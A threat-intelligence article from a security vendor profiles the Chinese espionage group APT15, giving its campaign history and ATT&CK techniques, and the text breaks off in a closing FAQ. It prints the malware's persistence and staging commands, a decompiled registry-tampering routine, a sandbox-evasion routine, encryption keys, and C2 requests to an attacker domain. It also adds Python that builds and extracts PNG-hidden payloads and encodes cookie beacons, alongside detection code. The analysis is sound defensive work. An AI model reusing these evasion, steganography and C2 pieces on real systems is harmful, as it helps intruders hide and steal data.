Picus Labs | 16 MIN READ

CREATED ON December 12, 2025

APT15 Cyber Espionage: Campaigns and TTPs Analysis

APT15, a cyber espionage group believed to be operating out of China, has demonstrated a persistent and evolving threat capability since becoming active around 2010. The group has orchestrated numerous high-profile campaigns, starting with the "moviestar" operation against European Ministries of Foreign Affairs in 2013 and surveillance activity against the Uyghur ethnic minority in 2015. Its operations expanded significantly over the years, including the 2016 targeting of Indian embassy personnel, the 2017 compromise of a UK government service provider, and the 2018 hack of a US Navy contractor. Despite a major infrastructure seizure by Microsoft in 2021, the group remained active, deploying the Graphican backdoor in 2022 and using the ORB3 (SPACEHOP) operational relay box network in 2023 for reconnaissance and exploitation against targets in North America, Europe, and the Middle East.

Technically, APT15 employs a wide range of tactics, techniques, and procedures to infiltrate and maintain access to victim networks. The group typically gains initial access through spear-phishing emails with weaponized attachments or by exploiting vulnerabilities in public-facing applications such as Microsoft Exchange and VPN appliances. Post-compromise, it relies on valid accounts and legitimate system tools such as the Windows command shell for execution, and establishes persistence through registry modifications, scheduled tasks, and Startup-folder shortcuts. Its tradecraft is characterized by defense evasion methods including steganography to hide payloads in PNG images, masquerading malware as legitimate software, and C2 channels hidden in HTTP headers or DNS TXT queries, over which sensitive data is also exfiltrated.

In this post, we examine the major historical operations of APT15, detail its significant campaigns against government and diplomatic targets, and analyze the group's tactics, techniques, and procedures to expose its operational methods. Finally, we show how the Picus Platform helps defend against this group.


What Are the Major Activities of the APT15 Group?

2010 – The group is believed to have become active [1].

1 March – 22 March 2012 – A cluster of malicious samples, later identified as BS2005 (a malware family used by the group), was active during this period [2].

August 2013 – Specific Syria-themed attacks against Ministries of Foreign Affairs (MFAs) in Europe began; the group, operating out of China, used the "moviestar" codename for this campaign, which preceded a G20 meeting in Russia focused on the Syrian crisis [1].

2015 – The group was active targeting the Uyghur ethnic minority using Android surveillanceware families such as SilkBean, DoubleAgent, CarbonSteal, and GoldenEagle [1].

28 January 2015 – Compilation date of a Ketrican backdoor sample belonging to a campaign that ESET later tied to a particular interest in Slovakia, coinciding with potential investments there by a Chinese steel giant [3].

May 2016 – Palo Alto Networks discovered the TidePool malware family (an evolution of BS2005) being used in an ongoing campaign against Indian embassy personnel worldwide [2].

May 2017 – The group compromised a company providing services to the UK Government, stealing sensitive documents related to military technology and government departments; during this incident, the group deployed new backdoors known as RoyalCli and RoyalDNS [4].

June 2018 – Intezer detected MirageFox, an upgraded version of the Mirage RAT, following the hack of a US Navy contractor [5].

July 2019 – Reports emerged of a hacking campaign targeting diplomats in Slovakia, Belgium, Brazil, Chile, and Guatemala, utilizing the Okrum backdoor and steganography to hide payloads within PNG images [3].

December 2021 – Microsoft announced the successful seizure of websites operated by NICKEL, disrupting attacks targeting organizations in 29 countries after obtaining a court order from the U.S. District Court [6].

Late 2022 – Symantec reported the group (tracked as Flea) using a new backdoor named Graphican to target foreign ministries, using Microsoft Graph API for command and control [7].

2023 – The group was observed utilizing ORB3 (SPACEHOP), a provisioned operational relay box network, to facilitate reconnaissance and vulnerability exploitation against targets in North America, Europe, and the Middle East [8].

Which MITRE ATT&CK Techniques Are Used by APT15?

The following section provides an in-depth breakdown of the TTPs linked to APT15, consolidating intelligence findings from multiple distinct operations [9] [2] [6].

Tactic: Resource Development

T1583.001 Acquire Infrastructure: Domains

To support Command and Control (C2) communications, the group procures its own infrastructure. In documented operations, the domain goback.strangled[.]net was identified as a C2 server used to manage infected systems.

Tactic: Initial Access

T1078 Valid Accounts

Following a successful intrusion, legitimate user credentials are frequently harvested via credential dumpers or stealers. These compromised credentials are subsequently employed to access victim accounts, including Microsoft 365 environments, through browser-based sign-ins or commercial VPN providers.

T1190 Exploit Public-Facing Application

Initial access is often achieved by exploiting internet-facing web applications on unpatched systems; Microsoft Exchange and SharePoint are frequent targets. Unpatched remote-access infrastructure such as Pulse Secure VPN appliances, vulnerable to publicly known exploits, has also been targeted to compromise networks.

T1566.001 Phishing: Spearphishing Attachment

Spear phishing emails are disseminated to gain entry into target networks. These emails often contain weaponized attachments packaged as MHTML documents, which are designed to open in Microsoft Word by default. To enhance credibility and induce the recipient to execute the file, sender addresses are spoofed to mimic real individuals associated with relevant organizations, such as Indian embassies.

Tactic: Execution

T1059.003 Command and Scripting Interpreter: Windows Command Shell

The Windows command shell is used to run the commands needed for data staging and collection. For example, the built-in xcopy utility copies files into a temporary directory for aggregation. The /D:m-d-y switch restricts the copy to files changed on or after the given date, which is how only material newer than the previous collection cycle is picked up; /S recurses into subdirectories, /Y suppresses overwrite prompts, and /C continues past errors.

The following command illustrates this activity:

xcopy /D:09-29-2021 /S/Y/C c:\users\[REDACTED]\Desktop c:\windows\temp\wmi\

T1559.001 Inter-Process Communication: Component Object Model

Malware families attributed to this group, such as Leeson, Neoichor, and NumbIdea, leverage the Internet Explorer (IE) Component Object Model (COM) interface. This interface is used to establish network connections and retrieve instructions from C2 servers.

Tactic: Persistence

T1547.009 Boot or Logon Autostart Execution: Shortcut Modification

Persistence mechanisms include creating .lnk shortcut files in the Startup folder that point to the malicious payload. An installer component manages this and takes command-line arguments that select the persistence method.

The arguments are as follows:

mdmode (1 = create a scheduled task, 2 = drop a shortcut in the Startup folder)
tn (name of the task or of the shortcut file)
fp (path of the binary to execute)

T1053 Scheduled Task/Job

The same installer can also create hidden scheduled tasks. Named by the tn argument, these tasks run the binary given by fp at every user logon. The installer drives the Task Scheduler through COM interfaces such as ITaskScheduler (Task Scheduler 1.0) and ITaskService (Task Scheduler 2.0).

T1547.014 Boot or Logon Autostart Execution: Active Setup

To survive reboots, the malware registers itself under the Active Setup registry key (HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components). The StubPath command stored there is executed for each user at logon, so the malware is launched automatically with the following parameters.

The command employed for this purpose is:

rundll32.exe C:\DOCUME~1\ALLUSE~1\IEHelper\mshtml.dll,, IEHelper

Tactic: Privilege Escalation

T1134 Access Token Manipulation

To run with administrator-level privileges, the APT15 backdoor impersonates the security context of a currently logged-on user by calling the ImpersonateLoggedOnUser API with that user's token.

Tactic: Defense Evasion

T1027 Obfuscated Files or Information

Payloads and network communications are obfuscated to bypass detection. Backdoors have been embedded in valid PNG files by steganography: the loader scans for a file with a PNG signature and a malformed zTXt chunk in which the payload is concealed.

The structure searched for is defined by these bytes:

PNG signature: 0x89504E47
zTXt header: 0x7A545874
IEND header: 0x49454E44
Byte 0x01 following the IEND header

The payload is decrypted utilizing the Tiny Encryption Algorithm (TEA) with the following hardcoded key:

0x3E6A125F2387541296A3DC560C69AD1E

In earlier iterations, the encrypted backdoor was appended to the end of a DLL and protected via RC4 encryption using keys such as:

0x4540DCA3FE052EBA0183D9FA36DA7F98
0xCDABDCA3FE2934B10893DFA1FA7D3698

Furthermore, C2 servers may return web pages that appear legitimate and contain strings like !DOCTYPE html. The malware parses these pages to extract and decode a Base64-encoded shellcode blob.
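The structure described above, worked through end to end. This is an added example, not code from the original report or from the malware: it builds a constructed carrier with the PNG signature, a malformed zTXt chunk holding TEA ciphertext, an IEND chunk and the trailing 0x01 byte, then extracts and decrypts the payload the way the loader does. The hardcoded key is the one quoted above; its word order, the little-endian block layout and the 4-byte length prefix used to frame the payload are assumptions.

```python
"""Added example: find a payload hidden in a malformed PNG zTXt chunk and
TEA-decrypt it. Key word order, endianness and framing are assumptions."""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"   # starts with the 0x89504E47 bytes the loader looks for
TEA_DELTA = 0x9E3779B9
MASK32 = 0xFFFFFFFF
# Hardcoded key quoted in the report, read here as four little-endian words (assumption).
TEA_KEY = bytes.fromhex("3E6A125F2387541296A3DC560C69AD1E")


def tea_encrypt_block(v0, v1, k):
    """Standard 32-round TEA on one 64-bit block given as two 32-bit words."""
    s = 0
    for _ in range(32):
        s = (s + TEA_DELTA) & MASK32
        v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK32
        v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK32
    return v0, v1


def tea_decrypt_block(v0, v1, k):
    """Inverse of tea_encrypt_block: same round function, reversed order."""
    s = (TEA_DELTA * 32) & MASK32
    for _ in range(32):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + s) ^ ((v0 >> 5) + k[3]))) & MASK32
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + s) ^ ((v1 >> 5) + k[1]))) & MASK32
        s = (s - TEA_DELTA) & MASK32
    return v0, v1


def _tea_blocks(data, key, block_fn):
    k = struct.unpack("<4I", key)
    data = data + b"\x00" * (-len(data) % 8)          # zero-pad to whole 8-byte blocks
    out = bytearray()
    for off in range(0, len(data), 8):
        v0, v1 = struct.unpack_from("<2I", data, off)
        out += struct.pack("<2I", *block_fn(v0, v1, k))
    return bytes(out)


def tea_encrypt(data, key):
    return _tea_blocks(data, key, tea_encrypt_block)


def tea_decrypt(data, key):
    return _tea_blocks(data, key, tea_decrypt_block)


def png_chunk(ctype, body):
    """PNG chunk: big-endian length, 4-byte type, data, CRC32 over type + data."""
    crc = zlib.crc32(ctype + body) & MASK32
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_carrier(payload, key):
    """Constructed carrier in the shape the loader searches for. The zTXt body is
    raw ciphertext instead of keyword + NUL + method + zlib text, hence 'malformed'."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1 8-bit RGB image header
    framed = struct.pack("<I", len(payload)) + payload     # assumed length-prefix framing
    return (PNG_SIGNATURE
            + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"zTXt", tea_encrypt(framed, key))
            + png_chunk(b"IEND", b"")
            + b"\x01")                                     # marker byte after IEND


def extract_payload(blob, key):
    """Walk the chunk list; return the decrypted payload, or None when the
    signature, the zTXt chunk or the 0x01 byte after IEND is missing."""
    if not blob.startswith(PNG_SIGNATURE):
        return None
    pos, hidden = len(PNG_SIGNATURE), None
    while pos + 12 <= len(blob):
        (length,) = struct.unpack_from(">I", blob, pos)
        ctype = blob[pos + 4:pos + 8]
        body = blob[pos + 8:pos + 8 + length]
        pos += 12 + length                                  # length + type + data + CRC
        if ctype == b"zTXt":                                # 0x7A545874: carries the payload
            hidden = body
        elif ctype == b"IEND":                              # 0x49454E44 followed by 0x01
            if hidden is None or blob[pos:pos + 1] != b"\x01":
                return None
            plain = tea_decrypt(hidden, key)
            if len(plain) < 4:
                return None
            (n,) = struct.unpack_from("<I", plain, 0)
            return plain[4:4 + n]
    return None


if __name__ == "__main__":
    carrier = build_carrier(b"constructed-backdoor-bytes", TEA_KEY)
    print(len(carrier), "byte carrier ->", extract_payload(carrier, TEA_KEY))
```

The same chunk walk can be pointed at a suspicious PNG from disk: a zTXt chunk whose body does not start with a printable keyword and a NUL byte, followed by an IEND chunk with trailing bytes, is the shape to alert on before any decryption is attempted.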

T1036 Masquerading

To evade detection during data staging, archiving utilities are renamed. Both rar.exe and 7z.exe have been observed running under the filename wp.exe.

T1036.005 Masquerading: Match Legitimate Name or Location 

Malicious services are configured to mimic legitimate system components. For instance, the service NtmSsvc is assigned the display name "Removable Storage" to blend in with the legitimate Removable Storage Manager.

Malware is frequently dropped into file paths belonging to existing, legitimate software. Files are created to appear as components of applications like Realtek, Foxit Reader, or Adobe Flash Player.

Observed paths include:

C:\Program Files\Realtek\Audio\HDA\AERTSr.exe
C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitRdr64.exe
C:\Program Files (x86)\Adobe\Flash Player\AddIns\airappinstaller\airappinstall.exe

T1112 Modify Registry

APT15 malware modifies several registry values under HKCU related to Internet Explorer. The changes suppress IE's first-run and default-browser prompts (so the IE COM object used for C2 can run without visible dialogs), mark the Internet Connection Wizard as completed, and set IEHarden to 0 under the ZoneMap key.

The following routine, recovered from a sample, performs these registry modifications:

#include <windows.h>
#include <string.h>

/* Decompiled routine, cleaned up for readability. Behaviour is unchanged: as in
 * the original, return values are not checked and the ICW key is created and then
 * re-opened. Constants replace the raw numbers from the decompiler output. */
BOOL ConfigureInternetExplorer(void)
{
    HKEY   hKey;
    DWORD  one  = 1;
    DWORD  zero = 0;
    LPWSTR path = (LPWSTR)VirtualAlloc(NULL, 0x200, MEM_COMMIT, PAGE_READWRITE);
    LPWSTR icw  = (LPWSTR)VirtualAlloc(NULL, 0x200, MEM_COMMIT, PAGE_READWRITE);

    memset(path, 0, 0x200);
    memset(icw, 0, 0x200);
    lstrcatW(path, L"Software\\Microsoft\\Internet Explorer\\Main\\");
    lstrcatW(icw,  L"Software\\Microsoft\\Internet Connection Wizard\\");

    /* HKCU\...\Internet Explorer\Main: DisableFirstRunCustomize = 1 (REG_DWORD) and
     * Check_Associations = "no" (REG_SZ, 4 bytes, written without a terminating NUL). */
    RegOpenKeyExW(HKEY_CURRENT_USER, path, 0, KEY_ALL_ACCESS, &hKey);
    RegSetValueExW(hKey, L"DisableFirstRunCustomize", 0, REG_DWORD, (const BYTE *)&one, sizeof(one));
    RegSetValueExW(hKey, L"Check_Associations", 0, REG_SZ, (const BYTE *)L"no", 2 * lstrlenA("no"));
    RegCloseKey(hKey);

    /* HKCU\...\Internet Connection Wizard: Completed = 01 00 00 00 (REG_BINARY). */
    RegCreateKeyExW(HKEY_CURRENT_USER, icw, 0, NULL, 0, KEY_ALL_ACCESS, NULL, &hKey, NULL);
    RegOpenKeyExW(HKEY_CURRENT_USER, icw, 0, KEY_ALL_ACCESS, &hKey);
    RegSetValueExW(hKey, L"Completed", 0, REG_BINARY, (const BYTE *)&one, sizeof(one));
    RegCloseKey(hKey);

    /* HKCU\...\Internet Settings\ZoneMap: IEHarden = 0 (REG_DWORD). */
    lstrcpyW(path, L"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\");
    RegOpenKeyExW(HKEY_CURRENT_USER, path, 0, KEY_ALL_ACCESS, &hKey);
    RegSetValueExW(hKey, L"IEHarden", 0, REG_DWORD, (const BYTE *)&zero, sizeof(zero));
    RegCloseKey(hKey);

    VirtualFree(path, 0x200, MEM_DECOMMIT);
    return VirtualFree(icw, 0x200, MEM_DECOMMIT);
}

The specific registry values modified are:

  • HKCU\Software\Microsoft\Internet Explorer\Main\Check_Associations
  • HKCU\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize
  • HKCU\Software\Microsoft\Internet Connection Wizard\Completed
  • HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IEHarden

T1218.011 System Binary Proxy Execution: Rundll32

Execution of the malware is often facilitated by rundll32.exe, which is used to load malicious Dynamic Link Libraries (DLLs). In the Active Setup example above, the DLL is a malicious file named mshtml.dll (after the legitimate Internet Explorer component) dropped in an IEHelper directory.

T1497 Virtualization/Sandbox Evasion

Malware loaders employ multiple heuristics to determine if they are executing within an emulated environment or sandbox. If the checks fail, the malware terminates.

These checks include:

  • Time acceleration check: GetTickCount is called, the loader sleeps for 20 seconds, and GetTickCount is called again. If the tick count has not advanced, the sleep was skipped by an emulator and execution stops.

  • Cursor position check: GetCursorPos is checked twice. A change in the X-axis position, suggesting random generation, triggers termination.

  • Memory check: GlobalMemoryStatusEx is called to verify physical memory. Execution halts if memory is less than 1.5 GB.

  • User interaction check: payload execution is held in a 100 ms polling loop until GetAsyncKeyState has reported the left mouse button pressed more than three times; an unattended sandbox never leaves this loop.

The logic for these checks is represented in the following code structure:

#include <windows.h>

/* The loader's checks as one routine, reconstructed from the decompiled fragment.
 * The cursor-position block is not part of the published excerpt and is left as
 * a placeholder here. Returns TRUE when an emulator or sandbox is suspected. */
BOOL IsEmulatorDetected(void)
{
    MEMORYSTATUSEX memoryStatusEx = { sizeof(memoryStatusEx) };
    int   numberOfLeftButtonClicks = 0;
    DWORD tickBefore;

    /* Time acceleration: a sandbox that skips Sleep leaves GetTickCount unchanged. */
    tickBefore = GetTickCount();
    Sleep(20000);
    if (tickBefore == GetTickCount())
        return TRUE;

    /* ... cursor-position checks (GetCursorPos called twice) ... */

    /* Physical memory: treat less than 1.5 GB (1536 MiB) as an analysis VM. */
    GlobalMemoryStatusEx(&memoryStatusEx);
    if ((memoryStatusEx.ullTotalPhys >> 20) < 1536)
        return TRUE;

    /* User interaction: poll every 100 ms until the left button has been seen
     * pressed more than three times (a held button is counted on every poll). */
    do {
        if (GetAsyncKeyState(VK_LBUTTON))
            ++numberOfLeftButtonClicks;
        Sleep(100);
    } while (numberOfLeftButtonClicks <= 3);

    return FALSE;
}

Tactic: Credential Access

T1056 Input Capture

Keylogging capabilities are deployed to capture user keystrokes. This is accomplished with a keylogging tool run under the filename csrss.exe, the name of a legitimate Windows process.

Tactic: Discovery

T1082 System Information Discovery

An APT15 backdoor automatically harvests system details, including the operating system version, build number, architecture, and computer name.

T1083 File and Directory Discovery

Connected drives are enumerated with the DriveLetterView utility, run as Drives.exe. The malware also performs recursive searches for specific files under C:\Program Files.

Tactic: Collection

T1005 Data from Local System

Data collection involves regularly searching for and copying files from directories such as Desktop, Documents, and Downloads. This activity typically targets files that have been created or modified since the previous collection cycle.

T1074.001 Data Staged: Local Data Staging

Collected files are aggregated into a central directory, such as c:\windows\temp\wmi\, in preparation for compression and exfiltration.

T1114.002 Email Collection: Remote Email Collection

Compromised credentials are used to access Microsoft 365 accounts via the legacy Exchange Web Services (EWS) protocol, allowing for the review and collection of victim emails.

Tactic: Command and Control

T1001 Data Obfuscation

C2 traffic is concealed within HTTP headers: client-to-server data travels in the Cookie header of the request, while server-to-client commands are embedded in the Set-Cookie header of the response.

An example of the client request format:

GET http://finance.globaleducat.com/images/21851.jpg?id=2590762476 HTTP/1.1
Accept: */*
Accept-Language: en-US
Cookie: g2LEwdO/8gRmxVUup5g5kEwi/LeTq05ozWW6ZmYKe0ACttv6du91EXrH60D59r2en...
User-Agent: Mozilla/4.0 ...
Host: finance.globaleducat.com

The cookie data follows this parameter structure:

tm=01/09/2018 12:30:00&hn=My-Computer&un=JohnDoe&dm=my.dns.suffix&ip=127.0.0.1&os=Windows S

T1071 Application Layer Protocol

HTTP is the primary C2 protocol. Certain variants, such as RoyalDNS, instead use DNS, retrieving backdoor commands from TXT records returned for their queries.

T1071.001 Application Layer Protocol: Web Protocols

HTTP POST requests are utilized to communicate with the C2 server, sending gathered victim information and receiving commands.

The following is a reconstruction of an HTTP POST request used for C2 communication:

POST http://goback.strangled.net:443/QCLDDMGXVXESLYT HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/xaml+xml, application/x-ms-xbap, application/x-ms-application, */*
Accept-Language: en-us
Content-Type: multipart/form-data; boundary=----_Part_4e67c6a7
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E)
Host: goback.strangled.net
Content-Length: 602
Proxy-Connection: Keep-Alive
Pragma: no-cache

----=_Part_4e67c6a7
Content-Disposition: form-data; name="m1.jpg"
Content-Type: application/octet-steam
WAQAAEYBAABGAQAARgEAAAAAAAAAAAAAhv0OeukKAAAVAAAAHAEAAAUAAAABAAAAKAoAAAIAAABTAGU AcgB2AGkAYwBlACAAUABhAGMAawAgADMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAABAQACAAAAUkUJAAAAV0lOWFBSRVY1tQFpc3UFAC kALAEA 

Observed URL formats also include:

http[:]//<C2>?id=<5-digit-rand><system-specific-string>
http[:]//<C2>?setssion==<rand><GetTickCount>
http[:]//<C2>/index.htm?content=<base64-system-specific-string>&id=<num>

T1132 Data Encoding

Data transmitted to the C2 server is typically Base64 encoded. In some instances, a URL-safe Base64 encoding is implemented where + characters are replaced with *.
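The Cookie-header beacon described under T1001 and the '*'-for-'+' Base64 variant described here, as one added example that is not code from the original report. It encodes a constructed beacon the way the client does, embeds it in a request modelled on the one quoted above, and on the analyst side pulls out the header, reverses the substitution and recognises the tm/hn/un/dm/ip/os layout. It assumes a variant whose cookie is only encoded; where the AES layer described under T1573 is present, decryption with the recovered key would sit between the Base64 step and the parser.

```python
"""Added example: encode and decode the cookie-carried beacon. The encoder, the
sample request and the Base64-only assumption are not from the original report."""
import base64
from typing import Optional

BEACON_FIELDS = ("tm", "hn", "un", "dm", "ip", "os")   # field names quoted in the report


def implant_encode(raw: bytes) -> str:
    """Client side: standard Base64 with every '+' replaced by '*'."""
    return base64.b64encode(raw).decode("ascii").replace("+", "*")


def implant_decode(blob: str) -> bytes:
    """Analyst side: undo the '*' substitution, then strict Base64 decoding."""
    return base64.b64decode(blob.replace("*", "+"), validate=True)


def parse_beacon(plain: bytes) -> dict:
    """Split 'k=v&k=v' into a dict. No URL-unquoting: values carry '/' and ':' literally."""
    fields = {}
    for pair in plain.decode("latin-1").split("&"):
        key, sep, value = pair.partition("=")
        if sep:
            fields[key] = value
    return fields


def cookie_from_request(raw_request: bytes) -> Optional[str]:
    """Return the Cookie header value of a raw HTTP/1.1 request, if any."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:                # skip the request line
        name, _, value = line.partition(":")
        if name.strip().lower() == "cookie":
            return value.strip()
    return None


def classify_cookie(cookie: str) -> Optional[dict]:
    """Decoded fields when the cookie is a beacon, else None. Ordinary
    'name=value; path=/' cookies fail strict Base64 validation and drop out;
    random Base64 drops out on the field-name check."""
    try:
        plain = implant_decode(cookie)
    except ValueError:                                 # binascii.Error is a ValueError
        return None
    fields = parse_beacon(plain)
    if sum(1 for f in BEACON_FIELDS if f in fields) >= 3:
        return fields
    return None


# Constructed beacon in the parameter layout shown in the report.
SAMPLE_BEACON = (b"tm=01/09/2018 12:30:00&hn=My-Computer&un=JohnDoe"
                 b"&dm=my.dns.suffix&ip=127.0.0.1&os=Windows S")

# Constructed request modelled on the one quoted in the report (cookie value is ours).
SAMPLE_REQUEST = (
    b"GET http://finance.globaleducat.com/images/21851.jpg?id=2590762476 HTTP/1.1\r\n"
    + b"Accept: */*\r\n"
    + b"Accept-Language: en-US\r\n"
    + b"Cookie: " + implant_encode(SAMPLE_BEACON).encode("ascii") + b"\r\n"
    + b"User-Agent: Mozilla/4.0\r\n"
    + b"Host: finance.globaleducat.com\r\n\r\n"
)

if __name__ == "__main__":
    print(classify_cookie(cookie_from_request(SAMPLE_REQUEST)))
```

In proxy logs the cheap first filter is the alphabet itself: a Cookie value consisting of a single token drawn from [A-Za-z0-9*/=] with no ';' or '=' separators is not how browsers format cookies, and the '*' character in particular does not occur in standard or URL-safe Base64.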

T1573 Encrypted Channel

Network traffic is encrypted using AES. The encryption key is either hardcoded within the malware or negotiated with the C2 server during the initial registration phase.

Tactic: Exfiltration

T1560.001 Archive Collected Data: Archive via Utility

Renamed versions of rar.exe or 7z.exe are employed to archive staged data files into formats like .rar or .7z prior to exfiltration.

Archived data is frequently secured using passwords derived from keyboard walks (e.g., 1qazxsw23edc, 4rfvbgt56yhn).

The following are examples of archiving commands:

"7z.exe" a -p1qazxsw23edc -t7z -y C:\windows\temp\wmi.7z c:\windows\temp\wmi\
wp.exe a -v500 -p4rfvbgt56yhn %temp%\b.rar
wp.exe a -v1000 -p5tgbnhy67ujm %temp%\p.rar
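The staging pattern above turned into a detection, as an added example that is not code from the original report. The checker recognises rar/7z "a" (add) command lines by the shape of their switches rather than by the binary name, so a renamed wp.exe is still caught, and tests the -p password for a QWERTY keyboard walk. The QWERTY grid ignores row stagger, the KNOWN_ARCHIVERS set and the third, benign command line are assumptions; the first two command lines are the ones quoted above.

```python
"""Added example: flag archiver command lines that fit the staging pattern
(renamed rar/7z, keyboard-walk password, volume splitting). Samples constructed."""
import re
import shlex

KNOWN_ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe", "7zr.exe"}   # assumption

# QWERTY rows on a plain grid; two keys are neighbours when both row and column differ by <= 1.
QWERTY_ROWS = ("1234567890", "qwertyuiop", "asdfghjkl", "zxcvbnm")
KEY_POS = {ch: (r, c) for r, row in enumerate(QWERTY_ROWS) for c, ch in enumerate(row)}


def is_keyboard_walk(password, min_len=6):
    """True when every consecutive pair of characters is a neighbouring key,
    e.g. 1qazxsw23edc snakes down column 1, back up column 2 and down column 3."""
    p = password.lower()
    if len(p) < min_len or any(ch not in KEY_POS for ch in p):
        return False
    for a, b in zip(p, p[1:]):
        (r1, c1), (r2, c2) = KEY_POS[a], KEY_POS[b]
        if a == b or max(abs(r1 - r2), abs(c1 - c2)) > 1:
            return False
    return True


def analyze_archiver_cmdline(cmdline):
    """Finding dict for rar/7z-style 'a' (add) commands, else None.
    Switches are matched by shape, so the image name is not trusted."""
    tokens = shlex.split(cmdline, posix=False)          # non-POSIX: backslashes stay literal
    if len(tokens) < 2 or tokens[1].lower() != "a":
        return None
    image = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    finding = {"image": image, "renamed": image not in KNOWN_ARCHIVERS,
               "password": None, "keyboard_walk": False, "volume_split": False,
               "archive": None}
    for tok in tokens[2:]:
        if tok.startswith("-p") and len(tok) > 2:          # -p<password>
            finding["password"] = tok[2:]
            finding["keyboard_walk"] = is_keyboard_walk(tok[2:])
        elif re.fullmatch(r"-v\d+[kmg]?", tok, re.IGNORECASE):   # -v500: split into volumes
            finding["volume_split"] = True
        elif not tok.startswith("-") and finding["archive"] is None:
            finding["archive"] = tok                       # first non-switch argument
    finding["suspicious"] = finding["renamed"] or finding["keyboard_walk"]
    return finding


def scan_process_events(cmdlines):
    """Run the analysis over a batch of process-creation command lines."""
    results = (analyze_archiver_cmdline(c) for c in cmdlines)
    return [f for f in results if f is not None and f["suspicious"]]


# Constructed sample: the two command lines quoted in the report plus a benign backup job.
SAMPLE_CMDLINES = [
    '"7z.exe" a -p1qazxsw23edc -t7z -y C:\\windows\\temp\\wmi.7z c:\\windows\\temp\\wmi\\',
    r'wp.exe a -v500 -p4rfvbgt56yhn %temp%\b.rar',
    r'"C:\Program Files\7-Zip\7z.exe" a -pCorrectHorseBattery backup.7z D:\finance',
]

if __name__ == "__main__":
    for finding in scan_process_events(SAMPLE_CMDLINES):
        print(finding)
```

Fed from Sysmon event 1 or Windows 4688 command lines, this flags the first two samples (keyboard-walk password, and an unknown image taking rar-style switches) and passes the third. The keyboard-walk test is deliberately strict, requiring every adjacent pair to be neighbours; loosening it to a ratio would also catch walks with a single digit or symbol appended.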

How Does Picus Simulate APT15 Attacks?

We strongly suggest simulating APT15 attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for APT15:

Threat ID   Threat Name                                                       Attack Module
37251       Ke3chang Threat Group Campaign Backdoor Malware Download Threat   Network Infiltration
99874       Ke3chang Threat Group Campaign Backdoor Malware Email Threat      Network Infiltration
68116       Ke3chang Threat Group Campaign Malware Email Threat               Network Infiltration
64390       Ke3chang Threat Group Campaign Malware Download Threat            Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

What Are the Aliases of the APT15 Group?

APT15 is also known as: BackdoorDiplomacy, BRONZE DAVENPORT, BRONZE IDLEWOOD, BRONZE PALACE, CTG-9246, Flea, G0004, GREF, Ke3chang, Lurid, Metushy, Mirage, NICKEL, Nylon Typhoon, Playful Dragon, Playful Taurus, Red Vulture, Royal APT, Social Network Team, and VIXEN PANDA.

Key Takeaways

  • Persistent Global Operations: Active since 2010 and believed to be based in China, APT15 persistently targets government, diplomatic, and military sectors across North America, Europe, and the Middle East.
  • Rapid Adaptation: The group remains resilient despite disruptions, evidenced by their deployment of the Graphican backdoor and ORB3 network following a major 2021 infrastructure seizure.
  • Exploitation of Public Interfaces: Attackers typically gain entry through spear-phishing emails or by exploiting unpatched vulnerabilities in public-facing applications such as Microsoft Exchange, SharePoint, and Pulse Secure VPN appliances.
  • Advanced Evasion Tradecraft: Strategies to avoid detection include steganography to conceal malicious code within PNG images and masquerading malware as legitimate software components.
  • Stealthy Network Communications: Command and Control traffic is obfuscated by hiding data within standard HTTP headers, cookies, DNS queries, or by using the Microsoft Graph API.

Frequently Asked Questions (FAQs)

Who is the APT15 cyber espionage group?

APT15 is a cyber espionage group believed to be operating out of China that has been active since approximately 2010. This group poses a persistent threat and has orchestrated high-profile campaigns targeting European Ministries of Foreign Affairs, the Uyghur ethnic minority, Indian embassy personnel, and government service providers in the UK and the US.

What sectors and regions does APT15 typically target?

APT15 primarily targets government and diplomatic sectors. Historical operations have focused on European Ministries of Foreign Affairs, Indian embassies worldwide, and contractors for the UK government and US Navy. Recent activities observed in 2023 involved reconnaissance and exploitation against targets across North America, Europe, and the Middle East.

How does APT15 gain initial access to victim networks?

The group frequently achieves initial access through spear phishing emails that contain weaponized attachments, often packaged as MHTML documents designed to open in Microsoft Word. APT15 also exploits vulnerabilities in public-facing applications on unpatched systems, such as Microsoft Exchange, SharePoint, and Pulse Secure VPN appliances.

What persistence mechanisms does APT15 use?

